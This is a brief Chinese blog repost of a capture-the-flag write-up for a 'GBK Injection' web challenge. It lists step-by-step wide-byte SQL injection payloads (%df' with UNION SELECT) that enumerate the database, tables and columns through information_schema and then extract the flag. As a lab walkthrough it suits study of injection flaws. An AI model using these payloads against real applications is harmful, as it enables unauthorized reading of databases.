CG CTF WEB GBK Injection
生活随笔
收集整理的這篇文章主要介紹了
CG CTF WEB GBK Injection
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
題解:
ctf4表里有個假flag
1、
id=1%df' and 1=2 %232、
id=1%df' order by 2 %233、
id=1%df' and 1=2 union select 1,2 %234、
id=1%df' and 1=2 union select 1,database() %235、
id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %236、
id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x67626b73716c69 %237、
id=1%df' and 1=2 union select 1,flag from gbksqli %23?
總結(jié)
以上是生活随笔為你收集整理的CG CTF WEB GBK Injection的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CG CTF WEB MYSQL
- 下一篇: CG CTF WEB /x00